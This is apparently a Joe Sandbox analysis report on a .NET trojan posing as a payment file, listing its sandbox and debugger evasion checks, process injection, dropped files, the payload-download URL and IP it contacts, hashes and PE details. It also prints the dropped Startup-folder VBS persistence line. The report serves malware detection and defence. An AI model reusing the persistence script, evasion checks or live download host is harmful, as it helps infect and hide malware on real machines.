              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeMemory allocated: 4B10000 memory reserve | memory write watchJump to behavior
              Source: rDecPayment_Swi.exe, 00000000.00000002.2314204473.0000000002E8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
              Source: rDecPayment_Swi.exe, 00000000.00000002.2314204473.0000000002E8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
              Source: rDecPayment_Swi.exe, 00000000.00000002.2312621597.0000000001012000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeMemory written: C:\Users\user\Desktop\rDecPayment_Swi.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess created: C:\Users\user\Desktop\rDecPayment_Swi.exe "C:\Users\user\Desktop\rDecPayment_Swi.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeQueries volume information: C:\Users\user\Desktop\rDecPayment_Swi.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeQueries volume information: C:\Users\user\Desktop\rDecPayment_Swi.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		Valid Accounts1
              Scheduled Task/Job              		1
              Scripting              		111
              Process Injection              		1
              Masquerading              		OS Credential Dumping211
              Security Software Discovery              		Remote Services11
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		2
              Virtualization/Sandbox Evasion              		LSASS Memory2
              Virtualization/Sandbox Evasion              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Registry Run Keys / Startup Folder              		2
              Registry Run Keys / Startup Folder              		1
              Disable or Modify Tools              		Security Account Manager1
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              DLL Side-Loading              		1
              DLL Side-Loading              		111
              Process Injection              		NTDS12
              System Information Discovery              		Distributed Component Object ModelInput Capture2
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Obfuscated Files or Information              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Software Packing              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              rDecPayment_Swi.exe21%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
              rDecPayment_Swi.exe26%VirustotalBrowse
              rDecPayment_Swi.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\CerberusInstall64.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\CerberusInstall64.exe21%ReversingLabsByteCode-MSIL.Trojan.Jalapeno

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://xianggrhen.com/book/Netnoyfq.mp3KAJ2BSIgoy4Kwyg0jeQ.K8BZdqVE7XAQiwtynX0%Avira URL Cloudsafe
              http://xianggrhen.com/book/Netnoyfq.mp30&eq0%Avira URL Cloudsafe
              http://xianggrhen.com/book/Netnoyfq.mp30%Avira URL Cloudsafe
              http://xianggrhen.com0%Avira URL Cloudsafe
              https://www.cerberusftp.com/00%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              xianggrhen.com
              		45.9.191.182
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://xianggrhen.com/book/Netnoyfq.mp3false
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0rDecPayment_Swi.exe, CerberusInstall64.exe.0.drfalse
                  		high
                  https://sectigo.com/CPS0rDecPayment_Swi.exe, CerberusInstall64.exe.0.drfalse
                    		high
                    http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#rDecPayment_Swi.exe, CerberusInstall64.exe.0.drfalse
                      		high
                      https://github.com/mgravell/protobuf-netirDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmpfalse
                        		high
                        https://stackoverflow.com/q/14436606/23354rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2314204473.0000000002E8E000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/mgravell/protobuf-netJrDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmpfalse
                            		high
                            http://ocsp.sectigo.com0rDecPayment_Swi.exe, CerberusInstall64.exe.0.drfalse
                              		high
                              http://xianggrhen.com/book/Netnoyfq.mp3KAJ2BSIgoy4Kwyg0jeQ.K8BZdqVE7XAQiwtynXrDecPayment_Swi.exe, CerberusInstall64.exe.0.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://stackoverflow.com/q/11564914/23354;rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/2152978/23354rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmpfalse
                                  		high
                                  http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zrDecPayment_Swi.exe, CerberusInstall64.exe.0.drfalse
                                    		high
                                    http://xianggrhen.com/book/Netnoyfq.mp30&eqrDecPayment_Swi.exe, 00000000.00000002.2314204473.0000000002E61000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/mgravell/protobuf-netrDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmpfalse
                                      		high
                                      http://xianggrhen.comrDecPayment_Swi.exe, 00000000.00000002.2314204473.0000000002E61000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.cerberusftp.com/0rDecPayment_Swi.exe, CerberusInstall64.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerDecPayment_Swi.exe, 00000000.00000002.2314204473.0000000002E61000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#rDecPayment_Swi.exe, CerberusInstall64.exe.0.drfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          45.9.191.182
                                          		xianggrhen.comGermany
                                          		47583AS-HOSTINGERLTfalse

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1572878
                                          Start date and time:2024-12-11 06:01:04 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 5m 44s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:8
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:rDecPayment_Swi.exe
                                          Detection:MAL
                                          Classification:mal100.expl.evad.winEXE@4/3@1/1
                                          EGA Information:
                                          • Successful, ratio: 50%
                                          HCA Information:
                                          • Successful, ratio: 85%
                                          • Number of executed functions: 168
                                          • Number of non-executed functions: 24
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target rDecPayment_Swi.exe, PID 5280 because it is empty
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          06:02:22AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CerberusInstall64.vbs

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          45.9.191.18210thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exeGet hashmaliciousUnknownBrowse
                                          • xianggrhen.com/composure/Emmaj.vdf
                                          LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exeGet hashmaliciousUnknownBrowse
                                          • xianggrhen.com/composure/Vuglyxyuvio.pdf
                                          MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeGet hashmaliciousUnknownBrowse
                                          • xianggrhen.com/camp/Reibbfkkyy.dat
                                          DecPayment410_F2103_S29103_M839_U4721_S381I_S98EEU_USD031224.exeGet hashmaliciousUnknownBrowse
                                          • xianggrhen.com/desk/Tbddfcris.vdf

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          xianggrhen.com10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exeGet hashmaliciousUnknownBrowse
                                          • 45.9.191.182
                                          LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exeGet hashmaliciousUnknownBrowse
                                          • 45.9.191.182
                                          MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeGet hashmaliciousUnknownBrowse
                                          • 45.9.191.182
                                          DecPayment410_F2103_S29103_M839_U4721_S381I_S98EEU_USD031224.exeGet hashmaliciousUnknownBrowse
                                          • 45.9.191.182
                                          AMTR-TT4781-SWFT-U4Y81-SO39-C37AR-AO937-CNR742-S3782-2818DY-9A82.exeGet hashmaliciousUnknownBrowse
                                          • 92.113.29.113

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          AS-HOSTINGERLT10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exeGet hashmaliciousUnknownBrowse
                                          • 45.9.191.182
                                          LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exeGet hashmaliciousUnknownBrowse
                                          • 45.9.191.182
                                          Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                          • 92.249.45.121
                                          MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeGet hashmaliciousUnknownBrowse
                                          • 45.9.191.182
                                          DecPayment410_F2103_S29103_M839_U4721_S381I_S98EEU_USD031224.exeGet hashmaliciousUnknownBrowse
                                          • 45.9.191.182
                                          https://application-workspace.com/red-bull/id-38772Get hashmaliciousUnknownBrowse
                                          • 45.84.207.234
                                          https://clickme.thryv.com/ls/click?upn=u001.5-2B1Zlj-2BwCegXqgd6Um7kY0JRT8UgUE3u1rWR4YFASxlUU28BkvglW4Sw74FAirirfRSk_jzclrAiO28PBUU1ZLf2yC1YJEF5Rt8zDnz4yKbEuFqXf3c0fVOhzL2fXxOYix3CjCrzlLwoIPSXb9PavK50mtpdK-2FWF7thydb3q6E5ptEQjRRfcuGnHeO06MZmpQ9Md6EqF3tHpTnJtwnRl07eBC-2BbeqGDZkqEsFQ9fh8CwKb92GLRs9xjA4K3L0qiP8u-2BrdM8wHoplpWV7e4Ic88yYySdEC6BFxZgKH7uN8ysaI5ELMcoW165-2BlUHwvAK7b88Y-2FPYUokK9PeBa-2FcZkvlS9nh3pVTeDrVNhWWvISMX1rFpeltySyG2xWyMwf0YLv9gS0X1AE0s7oDERqOcaTwfLsXQxoV99DX1bVNLU7d5FQCgc-3D#C?email=heath.teresa@aidb.orgGet hashmaliciousUnknownBrowse
                                          • 31.170.162.164
                                          la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                          • 46.17.173.161
                                          http://nemoinsure.comGet hashmaliciousUnknownBrowse
                                          • 195.110.59.5
                                          phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                          • 31.170.162.164

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\CerberusInstall64.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\rDecPayment_Swi.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):199936
                                          Entropy (8bit):6.008655364293679
                                          Encrypted:false
                                          SSDEEP:6144:7cfqNUAgggggggggggggggggggggggggggggggggggYIyjvMu+Su7f:7ciRgggggggggggggggggggggggggggB
                                          MD5:2091B5FB30DEB2E988E44A7763EF6873
                                          SHA1:6BB6A50E7F29EBB8FB8DAEA1136753A6B049A46C
                                          SHA-256:FBFD4F2EB410AF82DC9BEA05355FA616E4C60DAFB81E86BD4447AFDAD0BFD6CE
                                          SHA-512:ED3924A7D2680370D0945B3FF54593720BFEBF5826EF3C1A88397B5C464EE814EE334124DE84918C426D80893AD681E17DB9D515737F2C8534882EA5C1363022
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 21%
                                          Reputation:low
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Yg.............................+... ...@....@.. .......................@............`..................................+..S....@..b................+... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...b....@......................@..@.reloc....... ......................@..B.................+......H.......@!..X...........................................................2r...p(....&*B(....(....o....*2(.....o....*......(....r...p(.....(....(...+o....*....0..s.......s......r...p(....o.....rG..p(....o.....o.......8.....s....ra..p(..........&......,......io...........9.....o......*.......5..J..........^d......BSJB............v4.0.30319......l.......#~..`.......#Strings....|.......#US.|.......#GUID...........#Blob...........G.........%3........................................

                                          C:\Users\user\AppData\Local\CerberusInstall64.exe:Zone.Identifier

                                          Download File
                                          Process:C:\Users\user\Desktop\rDecPayment_Swi.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Reputation:high, very likely benign file
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CerberusInstall64.vbs

                                          Download File
                                          Process:C:\Users\user\Desktop\rDecPayment_Swi.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):91
                                          Entropy (8bit):4.73019162448222
                                          Encrypted:false
                                          SSDEEP:3:FER/n0eFHHoUkh4E2J5mATrLWStVnn:FER/lFHI923mALWo1
                                          MD5:B1F680D182C3D99A7AF7443E9992D31B
                                          SHA1:7DE6AFA173FE2BD805F6D59181F593DA6DB8B5A6
                                          SHA-256:B22D8199F86B7936A2D9CC891F820589EA82B484F2B0230CAB2B8F548E88ECDC
                                          SHA-512:496F3107DB805B5A02F272DDE0B5510F52E01748D9AD0C1AE68E59D75C2549F24DFCEB42C4CEBC3DF8346FD5FACE8D9A764D369A1F464BD792017FCACCD2206B
                                          Malicious:true
                                          Reputation:low
                                          Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Local\CerberusInstall64.exe"""

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):6.008655364293679
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:rDecPayment_Swi.exe
                                          File size:199'936 bytes
                                          MD5:2091b5fb30deb2e988e44a7763ef6873
                                          SHA1:6bb6a50e7f29ebb8fb8daea1136753a6b049a46c
                                          SHA256:fbfd4f2eb410af82dc9bea05355fa616e4c60dafb81e86bd4447afdad0bfd6ce
                                          SHA512:ed3924a7d2680370d0945b3ff54593720bfebf5826ef3c1a88397b5c464ee814ee334124de84918c426d80893ad681e17db9d515737f2c8534882ea5c1363022
                                          SSDEEP:6144:7cfqNUAgggggggggggggggggggggggggggggggggggYIyjvMu+Su7f:7ciRgggggggggggggggggggggggggggB
                                          TLSH:2D143FDE06F4004FE6184AF1EC49BFE44A21ECB96A11C661BD40FDCEAD723F114626E6
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Yg.............................+... ...@....@.. .......................@............`................................

                                          File Icon

                                          Icon Hash:c7a9d99be9ccb6cc

                                          Static PE Info

                                          General

                                          Entrypoint:0x402bee
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x675916E6 [Wed Dec 11 04:36:54 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Authenticode Signature

                                          Signature Valid:false
                                          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                          Signature Validation Error:The digital signature of the object did not verify
                                          Error Number:-2146869232
                                          Not Before, Not After
                                          • 09/02/2023 19:00:00 09/02/2026 18:59:59
                                          Subject Chain
                                          • CN="Redwood Software, Inc.", O="Redwood Software, Inc.", L=Frisco, S=Texas, C=US
                                          Version:3
                                          Thumbprint MD5:39005514BC3E21560C20467CB34EBD5F
                                          Thumbprint SHA-1:CE34A6650CDD0A6263E1390813492576A08B0F5D
                                          Thumbprint SHA-256:0D33161AD73435CF25FA2B40D4B3122F7AB650ED85180373088684FB8C6BBF29
                                          Serial:0E257A9470319DB94DA1259CD03509F3

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2b980x53.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x2d162.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x2e2000x2b00.rsrc
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x320000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xbf40xc00a80d1641ea652ac7edb65c48489d6f14False0.595703125data5.380706595241102IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0x40000x2d1620x2d20027618317590edac6f06f0ae3ccf27324False0.3015441049168975data5.815855660866531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x320000xc0x200913c1a6a6aa391e1e11131c97d8d77e5False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0x42b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3543 x 3543 px/m0.6719858156028369
                                          RT_ICON0x47180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 3543 x 3543 px/m0.519672131147541
                                          RT_ICON0x50a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3543 x 3543 px/m0.44183864915572235
                                          RT_ICON0x61480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3543 x 3543 px/m0.3288381742738589
                                          RT_ICON0x86f00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3543 x 3543 px/m0.26676901275389703
                                          RT_ICON0xc9180x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3543 x 3543 px/m0.2394177449168207
                                          RT_ICON0x11da00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3543 x 3543 px/m0.18898465419381963
                                          RT_ICON0x1b2480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3543 x 3543 px/m0.15380634094404352
